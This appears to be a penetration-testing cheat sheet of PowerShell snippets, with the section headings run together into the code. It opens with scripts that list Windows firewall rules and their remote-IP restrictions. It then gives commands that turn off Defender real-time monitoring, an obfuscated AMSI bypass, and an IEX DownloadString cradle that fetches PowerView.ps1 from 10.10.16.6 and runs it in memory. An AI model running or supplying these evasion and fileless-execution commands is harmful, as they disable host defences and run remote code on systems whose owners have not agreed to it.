Powershell
firewall restriction check
#firewall_rule.ps1 – Display all rules with key fields:
└─$ cat firewall_rule.ps1
netsh advfirewall firewall show rule name=all | Select-String "Rule Name" -Context 0,6 | % {
$c = $_.Context.PostContext
[pscustomobject]@{
'Rule Name' = ($_.Line -split ":\s*",2)[1]
'Enabled' = ($c[0] -split ":\s*",2)[1]
'Direction' = ($c[1] -split ":\s*",2)[1]
'Action' = ($c[2] -split ":\s*",2)[1]
'Protocol' = ($c[3] -split ":\s*",2)[1]
'LocalPort' = ($c[4] -split ":\s*",2)[1]
'RemoteIP' = ($c[5] -split ":\s*",2)[1]
}
} | ft -AutoSize
#Remote_IP_restriction.ps1 – List only rules with RemoteIP restrictions:
└─$ cat Remote_IP_restriction.ps1
netsh advfirewall firewall show rule name=all verbose | Select-String "Rule Name" -Context 0,15 | ForEach-Object {
$c = $_.Context.PostContext
$remoteIP = ($c | Where-Object { $_ -match "^RemoteIP" }) -replace "RemoteIP:\s*", ""
if ($remoteIP -and $remoteIP -ne "Any") {
[pscustomobject]@{
'Rule Name' = ($_.Line -replace "Rule Name:\s*", "").Trim()
'RemoteIP' = $remoteIP.Trim()
}
}
} | Format-Table -AutoSize
#Detailed check of Allow Ports rule:
netsh advfirewall firewall show rule name="Allow Ports" verboseBypass Realtime Monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
set-MpPreference -DisableAutoExclusions $trueAMSI Bypass
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )File Download
DownloadString - Fileless method
IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.6/PowerView.ps1')Last updated